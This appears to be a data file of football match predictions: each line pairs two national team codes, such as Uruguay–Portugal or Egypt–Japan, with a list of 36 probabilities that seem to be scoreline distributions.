('EGY', 'COL',0.000175121778937904,0.000233544833453578,0.000185977688556648,0.000100299039284073,4.0828440856749e-05,0.00093078607926487,0.00153020383568388,0.00125782058353891,0.000689281860572985,0.00536849959220262,0.00882576442735787,0.0072547381618834,0.0232229417533637,0.038178304702329,0.0669715394922664,0.0965680220361091,0.110100600874541,0.0313823925802329,0.00397557448465634,0.00028329327501039,1.333857053191e-05,0.158756948579169,0.0905021924599391,0.130497488665268,0.0171974558454709,0.0495949266700736,0.071512227550151,0.001633952059713,0.00706811518913337,0.0203834019200591,0.0293913626700255,9.67843763903776e-05,0.000563613898752286,0.00247735490240717,0.00737462780402358,0.0156516641834934),
('EGY', 'JPN',0.00327745375129103,0.00316794763848484,0.00209005770556086,0.000941921216427175,0.000321545225830621,0.00771479415947645,0.0106936799083794,0.00741139605406131,0.00342437726088497,0.0241785902783636,0.0335145824668667,0.0232277238870609,0.0568327763286025,0.0787774120474839,0.089058527345363,0.0697785838146103,0.123446376514548,0.0545977255537999,0.0107321871508107,0.0011866549371397,8.82530033405822e-05,0.0967219376627033,0.0855561411625178,0.067034415961227,0.0252264497159099,0.0395305421797618,0.0309727247120386,0.00371904200342854,0.00874176202599671,0.0136985820987786,0.010733027904382,0.000349213918257638,0.00111099866491841,0.00267735964757797,0.00440733345577508,0.00505484533292875),
('URU', 'POR',0.0021250894288508,0.00223369604337706,0.0015695031236817,0.000752907634668721,0.000273523616961012,0.00558338879257647,0.00823337002366088,0.00607054106966788,0.00298391130829956,0.0190433599654745,0.0280816964238613,0.0207048985964556,0.0487136359629131,0.0718340429048824,0.0830742170509644,0.0708356644111405,0.122502801401886,0.0529639147033596,0.0101772775029656,0.00110003292049449,7.9883747060435e-05,0.104455601720628,0.0903224663682557,0.0770160964926483,0.0260338612656506,0.0443970686791663,0.0378564609988012,0.00375190115843287,0.00959750524760803,0.0163671879203303,0.013955962174971,0.000343922278279642,0.0011903444671189,0.00312002891805194,0.00558323603278353,0.00706699599761652),
('URU', 'ESP',0.000581508523216559,0.00081041374610045,0.000725883441343848,0.000444174495433371,0.000205888738363372,0.00196262524937624,0.00369422904704467,0.00347680441193904,0.00218145089993796,0.00831243332567399,0.0156464065939672,0.0147255340110587,0.0264046388182369,0.0497011763860958,0.0559166350618525,0.0592068329009087,0.105251299260592,0.046776003094875,0.00923923971972177,0.00102653057197417,7.67330022790009e-05,0.111444404353593,0.099056711690437,0.104885320267963,0.0293486609992845,0.0621511385915105,0.0658081816460947,0.00434773115194212,0.0138106696617047,0.0292466100653485,0.0309675135698295,0.000410345647312965,0.00176436362296361,0.00574670105494954,0.0127872087080905,0.0218297673438605),
('URU', 'MAR',0.00383247921911008,0.00313236235503786,0.00171963940235727,0.000642042944348364,0.00018124592379657,0.00959488010053665,0.0109675864286023,0.00626834055290248,0.00238837678906224,0.0303472382809592,0.0346889127564182,0.0198258677953142,0.0719879921607729,0.0822870653485981,0.113843879682697,0.0900179915579777,0.130131130009384,0.047029795667604,0.0075540953886782,0.000682518400012178,4.10989185907276e-05,0.102896554432827,0.0743742704689857,0.0588088043895561,0.0179193953198402,0.0283382467484655,0.022407458913744,0.00215870842566862,0.00512076531596386,0.00809812543753075,0.00640330415041084,0.000163817160093642,0.00052450105622549,0.00126972836533045,0.00209043455034762,0.00226005371523376),
('URU', 'IRN',0.00179328045486061,0.00118672135179768,0.000488469176676053,0.000135609106195915,2.83688786382893e-05,0.00657125147564419,0.00553774180583047,0.00233338995027855,0.000655466777008687,0.0263224763287367,0.0221825443964368,0.00934686519905223,0.0790800005118865,0.0666424997525815,0.158385465026398,0.158611250437825,0.13347500310458,0.0280805686932518,0.00262560469433155,0.000138094158579517,4.75892563887443e-06,0.133665277562443,0.0562411975454892,0.056321371833735,0.00788804282616351,0.0157985751527943,0.0158210967130286,0.000553164071382581,0.00166185789291927,0.00332845388813882,0.00333319874481128,2.39411743791653e-05,9.65818265637534e-05,0.000293593884899362,0.000601952023128897,0.000746131464526927),
('URU', 'FRA',0.00113627593515345,0.00132867127241996,0.00101020446152507,0.000523839273414125,0.000205624983618133,0.0034943185073275,0.00556398316425182,0.00442974911805546,0.00235115463983756,0.013454001664799,0.0214227290951819,0.0170556438641711,0.0388509577225515,0.0618621554474903,0.0747929601697944,0.0719929085263368,0.119092398222041,0.0492513762973219,0.00905253438467099,0.000935932486204147,6.48739940276348e-05,0.114633892172703,0.0948150687048553,0.0912654419973568,0.0261408939454039,0.0503244953090698,0.0484404786118239,0.00360357454568748,0.0104059985878305,0.020032850759166,0.0192828735345181,0.000315157899173703,0.00123055969855702,0.00363719202890447,0.00733207349624698,0.0106601450424911),
('URU', 'AUS',0.0276815124663855,0.0159735505408092,0.00730811262659432,0.00228943198492292,0.000543821256231579,0.0348372567579993,0.0336520173966597,0.0162535512301073,0.00523352333731498,0.0691737170928969,0.0668202765554228,0.0322734525957812,0.103014780333186,0.0995099931078657,0.102274345547005,0.0507696163756152,0.0987947495260092,0.0480622231892363,0.0103918131456023,0.00126386686828253,0.000103911878869983,0.049042323434426,0.0477167684706474,0.0236868983808399,0.015475680553932,0.015364446688414,0.00762700616681882,0.00250956525644307,0.00373729104765465,0.0037104286858769,0.00184187970075516,0.000260771729175888,0.000526424874191026,0.000805783213817853,0.00084453717738115,0.000575255597105603),
('URU', 'PER',0.00436305880543275,0.00348282575409571,0.00188125969664677,0.00069124019645453,0.000192056408868046,0.0105277406441522,0.0118458525917039,0.00666449850767948,0.0024996394316082,0.0323923412490602,0.036447981813617,0.0205057017656033,0.0747499254869842,0.0841088917831117,0.11499737581687,0.0884575894799322,0.129395471298591,0.0473198175844001,0.0076910304124214,0.000703150876339472,4.28655001484327e-05,0.0995328058522016,0.0727981307123376,0.0559973400759442,0.0177481444093921,0.0273042417019442,0.0210028045107541,0.00216349394479199,0.00499256938303078,0.0076807083604673,0.00590810826976829,0.000166229125845236,0.000517828106220209,0.00121978616299552,0.0019545420366491,0.00205145578186422),
('URU', 'DEN',0.00583145451841488,0.00458856627466476,0.00250304158077281,0.000930475886003374,0.000261749381093957,0.0125796398524789,0.0143473816036798,0.00818176677931868,0.00311050055358736,0.0359831271089967,0.0410396213230826,0.0234033372536,0.0771953004056234,0.0880430955034004,0.110405716669439,0.0789518416875315,0.125920373465386,0.0502076332697074,0.00889735621248992,0.000886900160579341,5.91710671189245e-05,0.0900464730539259,0.071807606218145,0.0513500833935069,0.0190876708285666,0.02729943359641,0.0195220014369025,0.00253691215212551,0.00544248683814479,0.00778391503980199,0.00556632796263307,0.000213481777054422,0.000618949781798374,0.00135798039977065,0.00203038124005024,0.00200565407274435),
('URU', 'ARG',0.00143657403097549,0.00160438720995023,0.00117507244536988,0.000587041035724286,0.000222015161700049,0.00419432107347681,0.00643507745826043,0.0049364630375668,0.00252456607081264,0.0154791411437956,0.0237486521662733,0.0182180159246335,0.0428443256403348,0.0657332973114396,0.0790584879149153,0.0729413337469905,0.12129436076855,0.0504251882933868,0.00931691061613295,0.000968319897879734,6.74876850354345e-05,0.111909203980329,0.0930470740224935,0.0858475523559209,0.025788042675707,0.0475853833560483,0.043903462112601,0.00357358440354244,0.00989123443389256,0.0182517994219357,0.0168395655954277,0.000314267837302378,0.00117625928979427,0.00333285600962018,0.00644137231965093,0.00888209294034763),
('URU', 'ICE',0.0200150988470724,0.0126694041074292,0.00617035975600529,0.00205698920006615,0.000519871698612417,0.0280626480094633,0.0288359920724826,0.0148153238875368,0.00507453373642441,0.0600681441033644,0.0617234883389925,0.0317122250870438,0.0964319707500287,0.0990894210390976,0.103206395797553,0.0552283648808346,0.106050534149313,0.0509100523690201,0.0108620477880111,0.00130359414537194,0.000105683889153262,0.0567503355828316,0.0544865253090315,0.0291571242034147,0.017437673332748,0.0186626841883503,0.00998687653071241,0.00279034540682327,0.00447955419082421,0.00479424654727023,0.00256552314994804,0.000285863033276963,0.000621950263226299,0.00102587855764716,0.0011582531171932,0.000858361834943284),
('URU', 'CRO',0.00378420089590766,0.00322884348626565,0.00186143896572216,0.000730702746000468,0.000216984537356924,0.00924547675167107,0.0111254363973376,0.00669383193294123,0.00268498147525471,0.0289949169050063,0.0348906943943621,0.0209926546661456,0.0681986361203276,0.0820660317386806,0.106939525156788,0.0838437738005631,0.128684427796358,0.0493766000939623,0.00842042188386018,0.000807735269724645,5.17708650251994e-05,0.100892425321639,0.0774254511276227,0.0607038604410606,0.0198055848864278,0.0310563372480077,0.0243490936721321,0.00253315406614114,0.00595820477635717,0.00934282011807895,0.00732504932569208,0.000204714731986484,0.000650401240266022,0.00156318267404656,0.00255816313610443,0.0027908901151225),
('URU', 'NGA',0.010648617077324,0.00650534097709294,0.00281198098655606,0.000826042917868501,0.000183417587757285,0.0207749693027168,0.0186702273680968,0.00838935992870147,0.00251314061422261,0.0536190332346145,0.0481868120795191,0.0216524685201514,0.103790793254219,0.0932755991373705,0.133939114707072,0.0864223400074306,0.120369550906417,0.0419128572084682,0.00648627529378056,0.000564632683589556,3.27093502201817e-05,0.0776667687980984,0.054087369537644,0.0348991185324225,0.0125555351783575,0.0162025668533403,0.0104544795943658,0.00145728536035809,0.00282087897570826,0.00364026539210208,0.00234883031832462,0.00010635766417454,0.000277752667647033,0.00054827168768714,0.000735497698956272,0.000618264121686133),
('URU', 'BRA',0.000347456586308457,0.000497892586714147,0.000446193249781128,0.000272422315805345,0.000125851605147332,0.00138386170452258,0.00259155851328758,0.00242660646863927,0.00151476905330661,0.00657879161790792,0.0123201063869429,0.0115359347279233,0.0234563715852592,0.0439267589195893,0.0557550585681082,0.0662640115636374,0.10441252635203,0.0411308318118631,0.00720111693125999,0.000709177192874849,4.67190702888581e-05,0.124092647936649,0.0977666954281453,0.116194182245822,0.0256752431721268,0.0610292466423909,0.0725323012671831,0.00337138382892538,0.0120205102153631,0.0285723752559111,0.0339578193079193,0.000280104789249438,0.00134947931292185,0.00491935679014559,0.0122175116481198,0.0230501101004238),
('URU', 'SWI',0.00417278388637236,0.00353334588513754,0.002036294495695,0.000799480155666781,0.000237499681150964,0.00984424985147461,0.0118543519161594,0.00713744883928875,0.00286494930546818,0.0301564333316485,0.0363140898131523,0.0218645405518452,0.0692848986723403,0.0834322151234649,0.106122125059101,0.0812724391812917,0.12779125230683,0.0502341394286187,0.00877635716610363,0.000862486167086895,5.66935431897141e-05,0.0978674972370166,0.0769425044827033,0.058925554049584,0.0201638240928049,0.0308844770368497,0.0236525303298014,0.00264210142871667,0.00607027123391829,0.00929769827729734,0.00712053794010267,0.000219025951241456,0.000679943422405839,0.00159712247102138,0.00255573800037784,0.00273128626313923),
('URU', 'CRC',0.0106720164726132,0.00579705989812865,0.00219420474327554,0.000562817723467261,0.000108993775862727,0.022115084965324,0.0173032426818984,0.0067691851009871,0.00176544430712832,0.0583352815924772,0.0456425799807786,0.0178557902733294,0.115407822889087,0.0902971691029249,0.152211665855361,0.100376173133125,0.119093161859473,0.0353250695831871,0.00465689781222405,0.000345328893552927,1.694233363372e-05,0.0785361343140227,0.0465903225024955,0.0307240463571467,0.00921299123367967,0.0121510371488155,0.00801301662223144,0.000910910280426928,0.00180210276596858,0.002376797839036,0.00156738230314239,5.62371469522039e-05,0.000149834191422626,0.000301399060748057,0.000410860239010172,0.000340481608249494),
('URU', 'SRB',0.0096595037582777,0.00722106569130392,0.0039100945536351,0.00144692965135907,0.000405659119403483,0.0172085791664037,0.0195956631222907,0.0111569354299735,0.00423485568930131,0.0434810446743003,0.049512507418759,0.0281903115398424,0.0823979086689878,0.093827714923207,0.104097703629704,0.0657561100519544,0.118537591767841,0.0534215020133396,0.0107002412944826,0.00120557317162297,9.14485557028359e-05,0.0748774531790504,0.0674902527730207,0.042632030621573,0.0202772843091331,0.0256173823647279,0.0161819075280483,0.00304613067857543,0.00577251074179943,0.0072927228628229,0.00460664424310462,0.000291790507001364,0.000748630034432152,0.00145518096372339,0.00193304051277333,0.00171121391667548),
('URU', 'GER',0.000900436069028623,0.00121353454134058,0.00107719265884381,0.000654742056784435,0.000301758878973919,0.00264210418189229,0.00495209815477383,0.00464086092868425,0.00289945655171445,0.0101643692803531,0.0190510861390886,0.017853733619287,0.0293273076366896,0.0549681980852546,0.0564121556713816,0.0542554288807434,0.105733352197711,0.0515134706221681,0.0111544227914803,0.00135861348106535,0.000111875256105027,0.101690997307443,0.0990880567664311,0.0952997621317545,0.0321839141901072,0.0619069435182442,0.0595401422141051,0.00522668607296319,0.0150805845551558,0.0290080594536604,0.0278990350204765,0.00054396363663162,0.00212759940469789,0.00630990495627903,0.0128141966919603,0.0200666126546929),
('URU', 'MEX',0.00533740562516029,0.00434548627063021,0.00244645883855784,0.000938977885771343,0.000272764323102816,0.0116713532741094,0.0137494645659721,0.00809879417626264,0.00318026770156527,0.0338667638077044,0.0398968189893739,0.0235002696819345,0.073703387079659,0.0868264446499008,0.106932552868215,0.077571542611434,0.125972139826489,0.0511430464002576,0.00922818224799222,0.000936630419926902,6.36794137491901e-05,0.0913833341699696,0.0742008845146606,0.053827173489711,0.0200830611429924,0.0291375075491111,0.0211370751731926,0.00271782032998191,0.00591472409147206,0.00858137694443617,0.00622514500453841,0.000233101264480887,0.000685755805303622,0.00152689476539104,0.00231775026550794,0.00234351252531607),
('URU', 'SWE',0.00467487121734737,0.00412618323522396,0.00252412728901639,0.00105447903305317,0.000333648527495749,0.0101736903696318,0.0130687505840534,0.00839381952973554,0.00359413119841979,0.0298690510965662,0.0383686906895219,0.0246435084340098,0.0657696603441234,0.0844853003980661,0.0965469399032596,0.070863309586154,0.124020668155537,0.0542633635783192,0.0105520498966442,0.00115422237388705,8.48744119247569e-05,0.0910284159331578,0.0796562073596419,0.0584658870414867,0.0232349107908659,0.0341078169485144,0.0250343801072544,0.00338869434884129,0.0074616791679386,0.0109534135714712,0.00803956228667728,0.000314577520186565,0.000937378294361401,0.00211556643657804,0.00326063659503991,0.00343270687236077),
('URU', 'KOR',0.0179045682436811,0.0105195690813887,0.00461821683942147,0.00138237394904744,0.000313195217480307,0.0280647246810906,0.0257880604692493,0.0118480418091138,0.00362896865593799,0.0631453102109061,0.0580228417193607,0.0266579588408492,0.106557170441034,0.0979130487111809,0.119876208641895,0.0674300253041501,0.110151621026393,0.0449850773450446,0.00816513805600444,0.000833644942216325,5.70290257724529e-05,0.0619599725187421,0.0506079552907281,0.0284668304453906,0.013778600573855,0.0155008470133766,0.0087191822146305,0.00187569160503723,0.00316521352710449,0.00356084715463888,0.00200296636389947,0.000161880053497948,0.000369302268977146,0.000637689069783616,0.00075077675880195,0.000561932441445224),
('URU', 'BEL',0.00305354049426917,0.00347183470772687,0.00277992528435872,0.00153092978516585,0.000640460667926457,0.00629941830632596,0.0107476711815638,0.00916850018604235,0.00521423939142308,0.0189018128534547,0.0322490838686455,0.0275106789605329,0.0425370857799967,0.0725740995047552,0.0638176412207323,0.0478722420247853,0.108881644315422,0.0619106812601974,0.0156456631957298,0.00222405179795313,0.000215735602011973,0.0816766074242043,0.0928835055797916,0.0696757444206781,0.0352093697361974,0.0528239977946353,0.0396254571427184,0.00667341154644132,0.015018002854912,0.0225312453938113,0.0169016154777898,0.000819689564582008,0.00250766291299112,0.0058277907558048,0.00931508472353985,0.0112500670764669),
('URU', 'TUN',0.0171117807484198,0.00984512646700713,0.00419335511614032,0.00121648357793156,0.000266989517282345,0.0277956460110205,0.0247249992060101,0.0109967867898235,0.00326064910237195,0.063639022984161,0.0566086786445179,0.0251774960363225,0.109277688080343,0.0972055389520301,0.125097385767606,0.0716036191870366,0.111277599468336,0.0432335134872529,0.00746536069306898,0.000725109486889238,4.7084143085878e-05,0.0636934081994351,0.0494922578415782,0.0283285279020808,0.0128191370478376,0.0146749126985751,0.00839967081665326,0.00166016142542186,0.00285074462025322,0.00326343561754849,0.0018679351272332,0.000135937871162437,0.000315354301369559,0.000553478053892721,0.000661616483116979,0.000498386178912027),
('URU', 'PAN',0.035809870620996,0.0152922950293452,0.00511642383425474,0.00116394175799069,0.000200187121175946,0.0474026663423938,0.0330079290874362,0.011492216226525,0.00266746076773162,0.0923057110144423,0.0642752950123656,0.0223784287208417,0.134807990931436,0.0938709348740798,0.131253665811474,0.0638965267189242,0.0913959493813653,0.0326826041737223,0.00519426187949247,0.000464358667236297,2.76554109397211e-05,0.0444931094727365,0.0318209000551621,0.0154909577422039,0.00758596624900669,0.0073859559216386,0.00359560951668691,0.000904230927335652,0.00132058518711931,0.00128576685720283,0.000625933270797732,6.78605617789514e-05,0.000133750028190767,0.000199301451965109,0.000201928646304046,0.000123894748613112),
('URU', 'ENG',0.000887092116665129,0.000967959022855928,0.000667487426041751,0.00031268864878379,0.000110703469421905,0.00316155862148747,0.00452916227072548,0.00324417689666497,0.00154917298280989,0.0132721080121193,0.0190132583507822,0.0136189365240052,0.0417868697471325,0.0598627248548024,0.087709879077202,0.0920507199305746,0.125650769967205,0.0428788498483747,0.00650337179186523,0.000554825693953815,3.14752021628441e-05,0.131869339657072,0.0900019254356452,0.0944562017261115,0.0204756885444044,0.0429780975966833,0.0451051223265169,0.00232913806753631,0.00733322762008523,0.0153923113096408,0.0161540906492509,0.000166439556911988,0.000706810112021222,0.00226844913976989,0.0049458193479956,0.00745072839952362),
('URU', 'POL',0.010301821993869,0.00888295033171935,0.00578054886316639,0.00258958067276624,0.000881604067403207,0.0155558228010689,0.0216108868025578,0.0150114344437273,0.00695153222592886,0.0368971657542466,0.0512592925907748,0.035605920172937,0.0656378414423762,0.0911872023431613,0.0778438513481877,0.0461598451408442,0.10814437019977,0.0633407931191073,0.016488477663069,0.0024143495647906,0.000241710697861625,0.0641274460965085,0.0751196440268192,0.0445444447475175,0.0293320112900576,0.0347865907292387,0.0206277517521231,0.00572664379248719,0.010187355303977,0.0120817954169038,0.00716426276204052,0.000726261821990106,0.00175739223994047,0.00323167713570763,0.00409105909037608,0.00369537567171409),
('URU', 'SEN',0.0115367995984059,0.00702855235875323,0.00305459392471747,0.000902656746635152,0.00020166769329146,0.0217562906605326,0.0196795814864296,0.00890055050109227,0.00268365460505756,0.0549643469670492,0.0497178200946116,0.022486045694694,0.104145031590609,0.0942040473522523,0.131554218974118,0.0830885173568414,0.118996938061747,0.0426059813032196,0.00677989300444898,0.000606872746665742,3.61902307004503e-05,0.0751574463415704,0.0538191453626326,0.0339917110106004,0.0128463669649816,0.0162273105775836,0.0102490303016863,0.00153318250491536,0.00290503479472433,0.00366959016359892,0.00231768170096217,0.000115213551914767,0.000294616524713386,0.000569580599448301,0.000748746532224263,0.000618519586346625),
('URU', 'COL',0.00140561038365464,0.00141512789118406,0.000916334958424117,0.000403283551023845,0.000134163823725386,0.0044890183829791,0.00604474991353426,0.00406982088285898,0.00182675790346808,0.0172560449071251,0.0232363664082535,0.0156446256011906,0.0497499219928186,0.0669914469062282,0.0956207810697716,0.091892945819222,0.128759487886078,0.0451041306078611,0.00702216247013256,0.000614961542645132,3.58478653937246e-05,0.123739719668182,0.0866914363970106,0.083311717167508,0.0202451973780935,0.0389118516906305,0.0373948491021383,0.00236394754725796,0.00681536277311368,0.0130993232860354,0.012588638071402,0.000173617008265986,0.000675342669804722,0.00198575094592709,0.00396846956885038,0.00539942748091806),
('URU', 'JPN',0.0203327590877199,0.0138572875398012,0.00740426710197227,0.00271735481976303,0.000757144131058935,0.0265282313743894,0.0301188704872249,0.0170977542118016,0.00647065431866432,0.0554117368366065,0.062911805227436,0.0357135100154463,0.0868073488178404,0.0985568641755738,0.0906608868923963,0.0473427453092926,0.102931984874242,0.0559483477401525,0.013515797159875,0.00183661696704365,0.000169815415345576,0.053750662618875,0.0584319979283134,0.0305129509610529,0.0211736824288343,0.022113621184357,0.0115476427760933,0.00383629555288481,0.00600989366584157,0.00627668391321972,0.00327765873549399,0.000448892572501662,0.000955155473451915,0.00154302745940767,0.00171211789109054,0.00128508974878403),
('POR', 'ESP',0.00111618094160677,0.00135131901175885,0.00106969107790792,0.000578198670644631,0.000236701688584238,0.00334887318725615,0.00556542426861239,0.00462453272454873,0.00256180563999233,0.0127764699792357,0.0212329557178293,0.017643308724867,0.0365581591186027,0.0607552614260584,0.0697375201086139,0.0665148605420975,0.115895366931862,0.050483966916573,0.00977368536275216,0.00106435317814789,7.79026594219663e-05,0.110539694513683,0.0963020770981773,0.0918518355416595,0.0279660927664174,0.0533474880485705,0.0508822327248712,0.00406067225228451,0.0116190702571817,0.0221642764635622,0.0211400370373685,0.000375191608566285,0.00145271563139054,0.00426003978080691,0.0085303122455014,0.0125316799350002),
('POR', 'MAR',0.00656877846921711,0.00462655922688769,0.00224431621668885,0.000740118034824348,0.000184512207473181,0.0144940308523454,0.0146276255049798,0.00738122576437424,0.00248308671224478,0.041294307508456,0.0416749261730337,0.0210295265415476,0.0882373500843791,0.0890506530401949,0.125696581759587,0.0895291543260075,0.126855154647183,0.0449357261936238,0.00707445342915111,0.0006264934663988,3.69463591800583e-05,0.0903543641240737,0.0640122031772484,0.0455935900306731,0.0151166362035691,0.0215340725517578,0.0153379453742123,0.00178491505344935,0.00381399238647693,0.00543313920214963,0.00386982964289587,0.000132632749005498,0.000382430322554107,0.000833606412384645,0.00123526686421577,0.00117142337391639),
('POR', 'IRN',0.00304321477488778,0.00174435437699094,0.000634217630531807,0.000155491013768641,2.87232261060675e-05,0.00986853498615754,0.00734260961930399,0.00273160687463336,0.000677477218991933,0.0356084217286785,0.0264941797622416,0.00985639811029083,0.0963638245027737,0.0716987826196569,0.173853753728201,0.156828186517835,0.129354584674157,0.026673471376143,0.00244452642254147,0.000126017963963422,4.25455455914727e-06,0.116686838777903,0.0481226554428701,0.0434099846663464,0.00661539893481041,0.0119351005749385,0.0107662914313708,0.000454707898638777,0.00123053452012905,0.00222005557085799,0.00200264464632034,1.92784014261768e-05,7.00456064117408e-05,0.00019175721668449,0.000353985871182135,0.000387798260870236),
('POR', 'FRA',0.00209174052898066,0.00211979736232595,0.00142428465277365,0.00065238203695742,0.000226159926720481,0.00570371235532754,0.00801851733500262,0.00563638348554528,0.00264128786481508,0.0197818993385425,0.0278102212881089,0.019548385998171,0.0514564265861048,0.0723395961916942,0.0892318710722372,0.0773696051525126,0.125445895664625,0.0508490146359142,0.00916064615654783,0.000928308232048613,6.3009411009708e-05,0.108769426203314,0.0881785428793739,0.0764563038242028,0.0238285570242123,0.0413216942817428,0.0358284896684854,0.00321960485689174,0.00837479546931731,0.0145229414313095,0.0125922972441523,0.000275678243255217,0.000969338963785294,0.0025796293416304,0.00467995523281355,0.00590086414372685),
('POR', 'AUS',0.0435402970950431,0.0212590315940628,0.00859662689076492,0.0023790516125157,0.00049910341654176,0.0474593482332887,0.0404764171647264,0.0172604598196294,0.00490694737090301,0.0848868302983812,0.072397006761644,0.0308724366878938,0.113872833693678,0.0971181546290575,0.101837722905884,0.0455372957282935,0.0868538298331101,0.0414143376106973,0.00877667360094018,0.0010462409208283,8.4218896977319e-05,0.0388371658496373,0.0370372959126868,0.0165614297808979,0.0117736130543516,0.0105292711609822,0.00470822128558547,0.00187132943884973,0.00251032563269455,0.00224501171959576,0.00100386928999971,0.000190339705280596,0.000346004353696857,0.000476809200780203,0.000449675137709625,0.000269680375838267),
('POR', 'PER',0.00743945012028227,0.00511335378495333,0.00244054887965644,0.000792063761471612,0.00019434850963691,0.0158083121295312,0.0157047051537832,0.00780088860677684,0.00258325397641234,0.0438141153696909,0.0435269596030705,0.0216208429212969,0.0910759806248923,0.0904790726919951,0.126212510539071,0.0874522443089747,0.125385319349311,0.0449430384335926,0.00715971362561268,0.000641580861139298,3.83041274458508e-05,0.0868790861829844,0.0622817747669393,0.0431548422549508,0.0148828279184466,0.0206245275935545,0.0142906691116834,0.0017781972951072,0.00369632163128077,0.00512233883887836,0.00354925217522132,0.000133780881516122,0.000375306271177586,0.000796023751610117,0.00114804046726903,0.00105736719665303),
('POR', 'DEN',0.00987268786600368,0.00667462710283954,0.00321746999596646,0.00105647818014102,0.000262465592231622,0.0187194223563943,0.0188499422167252,0.00949068605881704,0.00318561973405251,0.0482330274169695,0.0485693288199692,0.0244539875304649,0.0932090033087261,0.0938588965512534,0.120082562552003,0.0773520868005348,0.12091982980278,0.0472566605644316,0.00820816374817828,0.000801957811091824,5.2394789413241e-05,0.077891418804124,0.0608814674203891,0.0392172556311532,0.0158620514393285,0.0204353197282601,0.0131635650657647,0.00206634864865004,0.00399316212030351,0.00514445089068715,0.00331383677513702,0.0001702480104664,0.000444508291995085,0.000878099051774409,0.00118158692787657,0.00102375238327666),
('POR', 'ARG',0.00261627518929202,0.00252973994784021,0.00163735981471019,0.000722545938987142,0.000241332680294864,0.00676632943933865,0.00916554688825786,0.00620774162077041,0.0028029646603059,0.0224936384495188,0.0304694738476606,0.0206366977631654,0.0560825232388249,0.0759683667438313,0.0932189315034421,0.0774730583504458,0.126272670467492,0.0514526844766674,0.00931803191389716,0.000949211247046322,6.47818708972263e-05,0.104943596857612,0.0855233322772154,0.0710773445369584,0.0232322904328725,0.0386161172047756,0.0320933597202062,0.00315550917150788,0.00786750960003989,0.0130771726404969,0.0108682704542549,0.000271686438591029,0.000915733524158128,0.00233614395656068,0.00406334012828488,0.00486641262113992),
('POR', 'ICE',0.0320991221287565,0.0172592245682845,0.0074293398612619,0.00218787126036516,0.000488362364922001,0.0391300426454616,0.0355001107505199,0.0161034562972212,0.00486986846395897,0.0754479197208131,0.0684489288767962,0.0310496027042097,0.109105208019595,0.0989839700213912,0.105184666553638,0.0507025021024337,0.0954271209398678,0.0449008186641101,0.00938975324531905,0.00110452773702164,8.76725139803753e-05,0.0459990411018279,0.0432873711979136,0.0208659503431695,0.0135785185976518,0.0130905937206028,0.00631010086724485,0.00212967618735487,0.00307972392473575,0.0029690583976744,0.00143118473996939,0.000213569156348256,0.000418421942496348,0.000621354227857831,0.000631257651560429,0.00041131600365626),
('POR', 'CRO',0.0065237867033811,0.00479641009838532,0.00244343114132233,0.00084721467126637,0.000222181677438246,0.0140484449392595,0.0149255085047595,0.0079286641720429,0.00280788716100763,0.0396864447232377,0.0421641235596838,0.0223982436314749,0.0840847813537585,0.0893343088607014,0.118768519992411,0.0838793959744136,0.126183400576283,0.0474557857624878,0.00793219883668434,0.000745796845900466,4.68116340049062e-05,0.089116100992185,0.0670306011307204,0.0473398703209059,0.0168061717165257,0.0237384709738662,0.0167651209829951,0.00210685420539891,0.00446385098087368,0.00630512401803781,0.00445294758417947,0.000166710545912881,0.000476983254591363,0.00103220177528023,0.00152032220311102,0.00145265321997096),
('POR', 'NGA',0.0173139678298409,0.00904957303220403,0.00345635409517828,0.000896792788103126,0.000175851637422987,0.0295544456360534,0.0234501255299636,0.00930331081392742,0.00246058646153647,0.0687104494813958,0.0545186563605637,0.0216290528863882,0.119807505258435,0.095061875710325,0.139268853811785,0.0809457370813705,0.110503581915151,0.0377136649080216,0.00572056075224645,0.000488091217400217,2.76923032770818e-05,0.0642268076704499,0.043839815155588,0.0254805439561952,0.00997469988304372,0.0115949749294212,0.00673922249242054,0.00113475202169175,0.00197861911589829,0.0023000229894349,0.00133681760916561,8.10977399911949e-05,0.000190729019918824,0.000339004320824625,0.000409333632369768,0.000303563458716561),
('POR', 'BRA',0.000672715525300177,0.000839029578412675,0.000664441014336737,0.000358329591111596,0.000146193678517792,0.00238558163711663,0.00394435276223263,0.00326082295212008,0.00179716284116104,0.010215722935926,0.0168908136923896,0.0139637492608425,0.0328099215344003,0.0542483655219889,0.0702505969047492,0.0752081403227252,0.116153281714832,0.0448474885671668,0.00769595027493294,0.000742863302855062,4.79242176499973e-05,0.124350150675568,0.0960246990599812,0.102801105749214,0.0247171469152916,0.0529228429504488,0.0566575769354896,0.00318114692163987,0.0102169157819806,0.0218758350719356,0.0234195999216585,0.000258776533616526,0.00112272984713826,0.00368506645344587,0.00823687470725693,0.0133765700388659),
('POR', 'SWI',0.00717470818421311,0.00523144580875466,0.00266420225070838,0.000923932898494068,0.00024239595145725,0.014909933895814,0.0158519992922491,0.00842679395218562,0.00298641010526721,0.0411428572599672,0.0437424168828281,0.0232531132033566,0.0851479984087626,0.0905279674573929,0.117479794645071,0.0810441960337834,0.124902607521961,0.048123931537558,0.00824077729246192,0.000793775666710909,5.1095983985508e-05,0.0861648714974595,0.0663972107412917,0.0458045451958018,0.0170548605156859,0.0235308116282968,0.0162328825667361,0.00219036510692318,0.00453311259984797,0.00625439408189681,0.00431463420222318,0.000177783899537099,0.000497020799053857,0.00105115894106518,0.00151387492199861,0.00141687916885566),
('POR', 'CRC',0.0171794307724942,0.0079873622871767,0.00267098174442844,0.000605089299225781,0.000103479370964767,0.0311498686861131,0.0215183142235858,0.00743242052945478,0.00171143750242022,0.0740150931520147,0.0511295905540384,0.0176601482136516,0.131900251398419,0.0911166298760824,0.156703861136666,0.0930858729789879,0.108250951487677,0.0314716619261672,0.00406654061504778,0.0002955650497455,1.42035413427704e-05,0.064303676035451,0.0373898524675392,0.0222104741532886,0.00724686961272956,0.00860963066733254,0.00511432826786801,0.000702291072550993,0.00125153350593088,0.00148688217529529,0.000883243873509595,4.24629227295642e-05,0.000101890027489719,0.000184560700483533,0.00022647892601857,0.000166049362222848),
('POR', 'SRB',0.0160827970517867,0.0102865546948408,0.00492268796597318,0.00160915399843973,0.000398436070273019,0.025086641459245,0.0252214825687006,0.012678524225666,0.00424889050046783,0.0570977325707662,0.0574046338201724,0.0288565923344148,0.0974667454993652,0.0979906308556223,0.110918198797289,0.0631130482576492,0.111514385935729,0.0492586660521325,0.00967056566389348,0.00106793208915551,7.93189337354331e-05,0.0634522819275694,0.0560568887949099,0.0318966694920157,0.0165078107301268,0.018786065163981,0.0106893715379613,0.00243063627825199,0.00414913512091381,0.00472176014311803,0.00268670677134127,0.000227930836735643,0.000526606823558318,0.000921585468714037,0.00110166026796769,0.000855298380442709),
